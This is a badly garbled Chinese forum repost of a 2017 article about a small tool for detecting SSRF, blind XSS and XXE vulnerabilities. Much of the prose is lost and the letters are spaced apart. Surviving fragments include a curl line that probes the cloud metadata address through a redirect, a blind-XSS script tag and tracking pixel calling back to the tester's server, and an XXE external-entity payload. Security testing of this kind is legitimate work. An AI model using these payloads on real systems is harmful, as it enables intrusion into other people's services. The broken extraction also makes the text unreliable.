[11469] 2017-06-17_一款用于发现SSRF、XXE、XSS漏洞的小工具

文档创建者:s7ckTeam
浏览次数:15
最后更新:2025-01-18
2017-06-17_一款用于发现SSRF、XXE、XSS漏洞的小工具 S S R F X X E X S S A l p h a _ h 4 c k   F r e e B u f   2 0 1 7 - 0 6 - 1 7 W e b S S R F B l i n d   X X S X X E G r o u n d - C o n t r o l G i t H u b S S R F B l i n d   X S S X X E 使 n e t c a t 使 G i t H u b R u b y   2 . 3 S S L 8 0 4 4 3 8 0 8 0 8 4 4 3 W e b 8 0 4 4 3 W e b 8 0 8 0 H T T P 8 0 访 8 0 8 0 8 4 4 3 H T T P S 使 S S L 使 S S L i n s t a l l . s h s t a r t . s h 8 0 4 3 3 r o o t R e d i r e c t s r e d i r e c t 使 使 c u r l   - v v   " h t t p : / / s e r v e r / r e d i r e c t ? u r l = h t t p : / / 1 6 9 . 2 5 4 . 1 6 9 . 2 5 4 / l a t e s t / m e t a - d a t a / "
P i n g   P o n g b o d y h e a d e r p i n g _ p o n g 使 c u r l   - v v   " h t t p : / / s e r v e r / p i n g _ p o n g ? b o d y = % 3 c h 1 % 3 e H e l l o % 3 c / h 1 % 3 e " B l i n d   C a l l b a c k 访 H T M L X S S   P a y l o a d c o n f i g . j s o n c a l l b a c k _ t o k e n s {     " c a l l b a c k _ t o k e n s " :   {         " e e 3 4 a 1 7 9 1 a b 3 4 5 f 7 8 9 " :   {             " h o s t " : " h a c k e r o n e . c o m " ,             " p o r t " :   4 4 3 ,             " s s l " :   t r u e ,             " p a t h " :   " / w e b h o o k s " ,             " p a r a m e t e r " :   " u r l " ,             " m e t h o d " :   " P O S T "         }     } } c a l l b a c k P a y l o a d c a l l b a c k p a r a m e t e r h o s t p o r t p a t h m e t h o d c a l l b a c k _ t o k e n P a y l o a d H T M L X S S P a y l o a d c a l l b a c k _ t o k e n l o g s / a c c e s s _ l o g 使 t a i l   - f   l o g s / a c c e s s _ l o g H T M L < i m g   s r c = " h t t p s : / / s e r v e r / p i x e l ? c a l l b a c k _ t o k e n = e e 3 4 a 1 7 9 1 a b 3 4 5 f 7 8 9 "   s t y l e = " d i s p l a y : n o n e ; " / > B l i n d   X S S < s c r i p t   s r c = " h t t p s : / / s e r v e r / c o l l e c t ? c a l l b a c k _ t o k e n = e e 3 4 a 1 7 9 1 a b 3 4 5 f 7 8 9 " > < / s c r i p t > X X E < ? x m l v e r s i o n = " 1 . 0 "   ? > < ! D O C T Y P E r   [
< ! E L E M E N T r   A N Y   > < ! E N T I T Y s p   S Y S T E M   " h t t p : / / s e r v e r / p i x e l ? c a l l b a c k _ t o k e n = e e 3 4 a 1 7 9 1 a b 3 4 5 f 7 8 9 " > ] > < r > & s p ; < / r > 8 0 4 4 3 8 0 8 0 8 4 4 3 r u b y a p p / s e r v e r . r b   - p   : p o r t 使 S S L - c e r t   : c e r t . p e m S S R F *   j o b e r t a b m a F B A l p h a _ h 4 c k F r e e B u f . C O M
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则